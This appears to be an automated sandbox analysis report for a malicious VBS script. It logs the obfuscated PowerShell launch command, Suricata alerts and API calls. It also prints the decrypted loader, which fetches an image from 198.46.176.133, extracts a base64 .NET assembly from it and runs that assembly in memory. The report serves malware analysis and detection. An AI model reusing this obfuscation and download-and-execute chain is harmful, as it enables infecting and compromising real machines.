Summary | ZeroBOX

weseethesimplethingsalwaystoget.gIF.vbs

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 July 30, 2024, 10:08 a.m. July 30, 2024, 10:10 a.m.
Size 405.3KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 c7f6cf5da3192c2cae7d911ee67f6620
SHA256 8ec7a5b08caf43325e9c75d3e9397418abe644cfc39185f5bc0ac5a9e954f858
CRC32 1FF1BCC4
ssdeep 3072:sHGowfvYF7hNe4VTdRnTT8w4TWIdqruoJTgCOpBKEMDS7opi70cmt07CjeJIvv:OwfvYFqdqR
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\weseethesimplethingsalwaystoget.gIF.vbs

    PID 2552
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')

      PID 2632

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
198.46.176.133 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 198.46.176.133:80 -> 192.168.56.101:49163 2047750 ET MALWARE Base64 Encoded MZ In Image A Network Trojan was detected
TCP 198.46.176.133:80 -> 192.168.56.101:49163 2049038 ET MALWARE Malicious Base64 Encoded Payload In Image A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Method invocation failed because [System.Security.Cryptography.AesManaged] does
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: n't contain a method named 'Dispose'.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:715
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + function Decrypt-AESEncryption {Param([String]$Base64Text,[String]$Key)$aesMa
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: naged = New-Object System.Security.Cryptography.AesManaged;$aesManaged.Mode = [
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: System.Security.Cryptography.CipherMode]::CBC;$aesManaged.Padding = [System.Sec
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: urity.Cryptography.PaddingMode]::Zeros;$aesManaged.BlockSize = 128;$aesManaged.
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: KeySize = 256;$aesManaged.Key = (New-Object System.Security.Cryptography.SHA256
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key));$cipherBytes
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: = [System.Convert]::FromBase64String($Base64Text);$aesManaged.IV = $cipherBytes
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: [0..15];$decryptor = $aesManaged.CreateDecryptor();$decryptedBytes = $decryptor
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: .TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16);$aesManaged.Di
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: spose <<<< ();return [System.Text.Encoding]::UTF8.GetString($decryptedBytes).Tr
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: im([char]0);}$chave = "87355924191917571657221755980918";$textoCriptografadoBas
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: e64 = "uNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihk
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: i2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoP
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: AD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4t
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: kwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keT
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: DVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67a
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: spbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQ
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: mmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX8
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: 3PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: 2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rl
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: Q2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcr
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: RaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1Naa
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: MlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcm
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: rf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28r
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: b84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACG
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: oSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: /dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6l
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: T/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMu
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: twbB720ZK5BpUkQ==";$textoDescriptografado = Decrypt-AESEncryption -Base64Text $
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: textoCriptografadoBase64 -Key $chave;Write-Host "Texto Descriptografado: $texto
console_handle: 0x000001af
1 1 0

WriteConsoleW

buffer: Descriptografado";Invoke-Expression $textoDescriptografado;
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (Dispose:String) [], RuntimeEx
console_handle: 0x000001c7
1 1 0

WriteConsoleW

buffer: ception
console_handle: 0x000001d3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : MethodNotFound
console_handle: 0x000001df
1 1 0

WriteConsoleW

buffer: Texto Descriptografado: $link = 'http://198.46.176.133/Upload/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NEB/74/11.321.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }
console_handle: 0x000001fb
1 1 0

WriteConsoleW

buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:916
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $link = 'http://198.46.176.133/Upload/vbs.jpeg'; $webClient = New-Object Syst
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: em.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catc
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: h { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.G
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: etString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE6
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: 4_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $sta
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: rtIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64C
console_handle: 0x0000009b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e6d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7500
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e6d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e6d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e6d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e6940
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e75c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e75c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e7180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e6c40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002e6c40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://198.46.176.133/Upload/vbs.jpeg
request: GET http://198.46.176.133/Upload/vbs.jpeg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02737000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02722000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02723000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02724000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02725000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02726000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02727000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02728000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02729000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af3000
allocation_type: 4096 (MEM_COMMIT)
